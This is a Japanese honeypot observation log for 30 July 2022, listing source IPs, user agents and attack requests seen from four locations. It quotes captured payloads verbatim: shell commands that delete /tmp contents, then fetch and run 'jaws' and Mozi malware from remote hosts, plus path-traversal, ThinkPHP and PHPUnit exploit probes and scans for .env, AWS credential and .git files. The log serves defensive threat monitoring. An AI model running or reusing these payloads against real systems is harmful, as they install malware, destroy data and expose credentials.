ハニーポット(仮) 観測記録 2022/07/30分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
Location:US
5.188.210.227に関する不正通信
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget qwugdsabbdsdeeeeb212c.bydthkk.top/jaws; sh /tmp/jaws
Location:SG
D-link製品の脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 2.56.57.238/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:229 (前日比:145)
US:総アクセス数:49 (前日比:-87)
UK:総アクセス数:42 (前日比:-66)
SG:総アクセス数:109 (前日比:34)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 4.28.87.68 | United States |
153 | 13.229.115.217 | United States |
1 | 20.124.210.194 | United States |
1 | 20.150.210.254 | United States |
1 | 20.222.70.43 | United States |
1 | 34.203.188.19 | United States |
1 | 58.255.210.194 | China |
1 | 89.250.82.219 | Kazakhstan |
1 | 91.236.239.34 | France |
16 | 95.214.235.205 | Ukraine |
1 | 107.182.129.137 | United States |
2 | 109.237.103.38 | Russia |
1 | 113.193.86.134 | India |
1 | 125.127.125.68 | China |
15 | 135.125.244.48 | France |
1 | 147.182.224.91 | United States |
6 | 163.123.143.71 | United States |
1 | 164.92.85.51 | United States |
1 | 172.104.242.173 | United States |
1 | 172.105.77.209 | United States |
1 | 174.138.61.44 | United States |
1 | 176.97.70.37 | United Kingdom |
2 | 179.43.155.171 | Panama |
11 | 185.7.214.104 | Hong Kong |
1 | 188.165.87.104 | France |
1 | 188.166.8.119 | United States |
1 | 192.241.206.88 | United States |
1 | 192.241.216.81 | United States |
1 | 205.210.31.11 | United States |
1 | 205.210.31.26 | United States |
1 | 209.141.51.222 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
1 | Hello, World |
1 | MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 |
38 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
11 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | facebookexternalhit/1.1 (+http[:]//www[.]facebook[.]com/externalhit_uatext.php) |
142 | python-requests/2.28.1 |
1 | python-urllib3/1.26.9 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01C\x01 |
||
3 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
40 | GET | /.env |
HTTP/1.1 |
1 | GET | //.aws/credentials |
HTTP/1.1 |
1 | GET | //.env.bak |
HTTP/1.1 |
1 | GET | //.git/config |
HTTP/1.1 |
1 | GET | //.phpinfo |
HTTP/1.1 |
1 | GET | //.travis.yml |
HTTP/1.1 |
1 | GET | //123[.]php |
HTTP/1.1 |
1 | GET | //?p=info |
HTTP/1.1 |
1 | GET | //?p=php |
HTTP/1.1 |
1 | GET | //?phpinfo.php |
HTTP/1.1 |
1 | GET | //?phpinfo=1 |
HTTP/1.1 |
1 | GET | //?phpinfo |
HTTP/1.1 |
1 | GET | //?q=info |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo/info.php |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo |
HTTP/1.1 |
1 | GET | // |
HTTP/1.1 |
1 | GET | //a[.]php |
HTTP/1.1 |
1 | GET | //admin/info.php |
HTTP/1.1 |
1 | GET | //admin/phpinfo.php |
HTTP/1.1 |
1 | GET | //adminphp[.]php/configuration.php |
HTTP/1.1 |
1 | GET | //apache/i.php |
HTTP/1.1 |
1 | GET | //apache/info.php |
HTTP/1.1 |
1 | GET | //apache/phpinfo.php |
HTTP/1.1 |
1 | GET | //apache2[.]php |
HTTP/1.1 |
1 | GET | //apache[.]php |
HTTP/1.1 |
1 | GET | //asdf[.]php |
HTTP/1.1 |
1 | GET | //aws-secret.yaml |
HTTP/1.1 |
1 | GET | //aws[.]yml |
HTTP/1.1 |
1 | GET | //build[.]php |
HTTP/1.1 |
1 | GET | //cache[.]php |
HTTP/1.1 |
1 | GET | //config/cache.php |
HTTP/1.1 |
1 | GET | //config[.]js |
HTTP/1.1 |
1 | GET | //dashboard/i.php |
HTTP/1.1 |
1 | GET | //dashboard/info.php |
HTTP/1.1 |
1 | GET | //dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | //dashboard/test.php |
HTTP/1.1 |
1 | GET | //debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | //dep[.]php |
HTTP/1.1 |
1 | GET | //deploy[.]php |
HTTP/1.1 |
2 | GET | //dev[.]php |
HTTP/1.1 |
1 | GET | //developer[.]php |
HTTP/1.1 |
1 | GET | //devs[.]php |
HTTP/1.1 |
1 | GET | //env[.]template |
HTTP/1.1 |
1 | GET | //frontend_dev[.]php/$ |
HTTP/1.1 |
1 | GET | //i[.]php |
HTTP/1.1 |
1 | GET | //in[.]php |
HTTP/1.1 |
1 | GET | //index1[.]php |
HTTP/1.1 |
1 | GET | //index[.]php |
HTTP/1.1 |
1 | GET | //inf[.]php |
HTTP/1.1 |
1 | GET | //info1[.]php |
HTTP/1.1 |
1 | GET | //info2[.]php |
HTTP/1.1 |
1 | GET | //info3[.]php |
HTTP/1.1 |
1 | GET | //info4[.]php |
HTTP/1.1 |
2 | GET | //info[.]php |
HTTP/1.1 |
2 | GET | //infophp[.]php |
HTTP/1.1 |
1 | GET | //infos[.]php |
HTTP/1.1 |
1 | GET | //ini[.]php |
HTTP/1.1 |
1 | GET | //isadmin[.]php |
HTTP/1.1 |
1 | GET | //jo[.]php |
HTTP/1.1 |
1 | GET | //l[.]php |
HTTP/1.1 |
1 | GET | //lindex[.]php |
HTTP/1.1 |
1 | GET | //linusadmin-phpinfo.php |
HTTP/1.1 |
1 | GET | //main[.]yml |
HTTP/1.1 |
1 | GET | //new[.]php |
HTTP/1.1 |
1 | GET | //o[.]php |
HTTP/1.1 |
1 | GET | //ocp[.]php |
HTTP/1.1 |
1 | GET | //of[.]php |
HTTP/1.1 |
1 | GET | //old_phpinfo[.]php |
HTTP/1.1 |
1 | GET | //p[.]php |
HTTP/1.1 |
1 | GET | //php-info.php |
HTTP/1.1 |
1 | GET | //php1[.]php |
HTTP/1.1 |
1 | GET | //php52/phpinfo.php |
HTTP/1.1 |
1 | GET | //php[.]ini |
HTTP/1.1 |
1 | GET | //php[.]php |
HTTP/1.1 |
1 | GET | //php_info[.]php |
HTTP/1.1 |
1 | GET | //phpcustom_info/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpinfo/info.php |
HTTP/1.1 |
1 | GET | //phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpinfo1[.]php |
HTTP/1.1 |
1 | GET | //phpinfo2[.]php |
HTTP/1.1 |
1 | GET | //phpinfo3[.]php |
HTTP/1.1 |
1 | GET | //phpinfo4[.]php |
HTTP/1.1 |
1 | GET | //phpinfo[.]html |
HTTP/1.1 |
1 | GET | //phpinfo[.]php3 |
HTTP/1.1 |
1 | GET | //phpinfo[.]php4 |
HTTP/1.1 |
1 | GET | //phpinfo[.]php5 |
HTTP/1.1 |
2 | GET | //phpinfo[.]php |
HTTP/1.1 |
1 | GET | //phpinfo[.]txt |
HTTP/1.1 |
2 | GET | //phpinfo |
HTTP/1.1 |
1 | GET | //phpinfodev[.]php |
HTTP/1.1 |
1 | GET | //phpinfos[.]php |
HTTP/1.1 |
1 | GET | //phpsysinfo/info.php |
HTTP/1.1 |
1 | GET | //phpsysinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpsysinfo/phpsysinfo.php |
HTTP/1.1 |
1 | GET | //phpsysinfo[.]php |
HTTP/1.1 |
1 | GET | //phpsysinfo |
HTTP/1.1 |
1 | GET | //phptest[.]php |
HTTP/1.1 |
1 | GET | //phpversion[.]php |
HTTP/1.1 |
1 | GET | //pi[.]php5 |
HTTP/1.1 |
1 | GET | //pi[.]php |
HTTP/1.1 |
1 | GET | //pinfo[.]php |
HTTP/1.1 |
1 | GET | //q[.]php |
HTTP/1.1 |
1 | GET | //qq[.]php |
HTTP/1.1 |
1 | GET | //rest[.]php |
HTTP/1.1 |
1 | GET | //s3[.]js |
HTTP/1.1 |
1 | GET | //server/s3.js |
HTTP/1.1 |
1 | GET | //settings[.]py |
HTTP/1.1 |
1 | GET | //temp[.]php |
HTTP/1.1 |
1 | GET | //test123[.]php |
HTTP/1.1 |
1 | GET | //test1[.]php |
HTTP/1.1 |
1 | GET | //test1 |
HTTP/1.1 |
1 | GET | //test2[.]php |
HTTP/1.1 |
1 | GET | //test3[.]php |
HTTP/1.1 |
1 | GET | //test4[.]php |
HTTP/1.1 |
1 | GET | //test5[.]php |
HTTP/1.1 |
1 | GET | //test6[.]php |
HTTP/1.1 |
1 | GET | //test7[.]php |
HTTP/1.1 |
1 | GET | //test8[.]php |
HTTP/1.1 |
1 | GET | //test9[.]php |
HTTP/1.1 |
1 | GET | //test[.]php |
HTTP/1.1 |
1 | GET | //test_info1[.]php |
HTTP/1.1 |
1 | GET | //test_info2[.]php |
HTTP/1.1 |
1 | GET | //test_info3[.]php |
HTTP/1.1 |
1 | GET | //test_info4[.]php |
HTTP/1.1 |
1 | GET | //test_info5[.]php |
HTTP/1.1 |
1 | GET | //test_info[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo1[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo2[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo3[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo4[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo5[.]php |
HTTP/1.1 |
1 | GET | //test_phpinfo[.]php |
HTTP/1.1 |
1 | GET | //tester[.]php |
HTTP/1.1 |
1 | GET | //testing[.]php |
HTTP/1.1 |
1 | GET | //time[.]php |
HTTP/1.1 |
1 | GET | //token[.]php |
HTTP/1.1 |
1 | GET | //tz[.]php |
HTTP/1.1 |
1 | GET | //u[.]php |
HTTP/1.1 |
1 | GET | //up[.]php |
HTTP/1.1 |
1 | GET | //w[.]php |
HTTP/1.1 |
1 | GET | //web[.]php |
HTTP/1.1 |
1 | GET | //wp-config.old |
HTTP/1.1 |
1 | GET | //wp-config.php.backup |
HTTP/1.1 |
1 | GET | //wp-config.php.bak |
HTTP/1.1 |
1 | GET | //wp-config.txt |
HTTP/1.1 |
1 | GET | //wp[.]php |
HTTP/1.1 |
1 | GET | //wpp-config.php~ |
HTTP/1.1 |
1 | GET | //x[.]php |
HTTP/1.1 |
1 | GET | /0bef |
HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]255[.]210[.]194:49035/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws |
|
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stream?streams=btcusdt@depth |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
8 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/bin/sh |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /owa |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.210.227 | Russia |
1 | 20.0.79.186 | United States |
2 | 45.227.254.52 | Belize |
1 | 51.79.29.48 | Canada |
4 | 52.149.148.198 | United States |
2 | 80.66.76.110 | Russia |
1 | 92.119.177.24 | Romania |
2 | 109.237.103.38 | Russia |
1 | 162.142.125.210 | United States |
3 | 163.123.143.71 | United States |
1 | 164.92.85.208 | United States |
1 | 172.105.89.161 | United States |
11 | 185.7.214.104 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.213.234 | United States |
2 | 193.37.69.209 | Russia |
2 | 193.56.29.120 | United Kingdom |
1 | 198.235.24.22 | United States |
1 | 205.210.31.16 | United States |
1 | 209.141.35.128 | United States |
1 | 212.192.246.208 | Czechia |
1 | 223.130.30.59 | India |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
5 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
12 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_34.68.118.83_80\n |
||
6 | \x03 |
||
1 | \x16\x03\x01\x01C\x01 |
||
2 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
18 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 44.201.18.154 | United States |
1 | 95.137.214.103 | Georgia |
1 | 103.181.57.133 | India |
2 | 109.237.103.38 | Russia |
1 | 112.172.136.145 | South Korea |
1 | 112.239.66.54 | China |
1 | 117.216.18.246 | India |
1 | 134.209.46.195 | United States |
1 | 162.142.125.8 | United States |
6 | 163.123.143.71 | United States |
1 | 167.248.133.61 | United States |
1 | 172.104.138.223 | United States |
6 | 172.105.85.90 | United States |
1 | 175.107.13.186 | Pakistan |
11 | 185.7.214.104 | Hong Kong |
1 | 188.166.8.119 | United States |
1 | 192.241.220.69 | United States |
2 | 194.165.16.71 | Panama |
1 | 198.235.24.26 | United States |
1 | 201.140.130.14 | Mexico |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 |
7 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
5 | \"Mozilla/5.0 |
1 | python-requests/2.25.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01C\x01 |
||
1 | \x16\x03\x01 |
||
2 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /nmaplowercheck1659081576 |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]181[.]57[.]133:35105/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws |
|
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.0 |
7 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
45 | 5.39.216.167 | Netherlands |
1 | 20.55.53.144 | United States |
1 | 47.117.115.239 | China |
13 | 51.79.29.48 | Canada |
1 | 107.182.129.137 | United States |
2 | 109.237.103.9 | Russia |
1 | 110.42.215.214 | China |
1 | 120.85.112.99 | China |
1 | 122.165.245.122 | India |
1 | 124.162.128.4 | China |
1 | 137.184.33.230 | United States |
1 | 147.182.255.203 | United States |
1 | 162.142.125.213 | United States |
1 | 162.142.125.222 | United States |
4 | 163.123.143.71 | United States |
1 | 167.94.138.44 | United States |
1 | 167.248.133.46 | United States |
1 | 172.105.89.161 | United States |
1 | 179.92.208.9 | Brazil |
11 | 185.7.214.104 | Hong Kong |
2 | 185.47.160.222 | Hungary |
8 | 185.254.196.223 | Ukraine |
1 | 188.166.8.119 | United States |
1 | 192.241.220.50 | United States |
1 | 192.241.221.44 | United States |
2 | 194.165.16.11 | Panama |
1 | 203.174.87.98 | Singapore |
1 | 205.210.31.8 | United States |
1 | 205.210.31.22 | United States |
1 | 212.154.7.246 | Turkey |
UserAgent一覧
件数 | UserAgent |
---|---|
16 | - |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
1 | Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko |
25 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
43 | curl/7.54.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01\x02 |
||
3 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
25 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /JUdY |
HTTP/1.1 |
1 | GET | /LGupRhAvBNgcmoZUW2KjfeMak66 |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /base.jhtml |
HTTP/1.1 |
1 | GET | /base.jsa |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /default.asp |
HTTP/1.1 |
1 | GET | /default.cgi |
HTTP/1.1 |
1 | GET | /default.jhtml |
HTTP/1.1 |
1 | GET | /default.jsp |
HTTP/1.1 |
1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /home.asp |
HTTP/1.1 |
1 | GET | /home.html |
HTTP/1.1 |
1 | GET | /home.php |
HTTP/1.1 |
1 | GET | /index.aspx |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /index.shtml |
HTTP/1.1 |
1 | GET | /inicio.asp |
HTTP/1.1 |
1 | GET | /inicio.jhtml |
HTTP/1.1 |
1 | GET | /inicio.jsa |
HTTP/1.1 |
1 | GET | /localstart.html |
HTTP/1.1 |
1 | GET | /main.cfm |
HTTP/1.1 |
1 | GET | /main.html |
HTTP/1.1 |
1 | GET | /main.shtml |
HTTP/1.1 |
1 | GET | /menu.html |
HTTP/1.1 |
1 | GET | /menu.jhtml |
HTTP/1.1 |
1 | GET | /menu.php |
HTTP/1.1 |
1 | GET | /nmaplowercheck1659101124 |
HTTP/1.1 |
2 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /readme.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+2[.]56[.]57[.]238/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /start.cfm |
HTTP/1.1 |
1 | GET | /start.jsp |
HTTP/1.1 |
1 | GET | /start.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |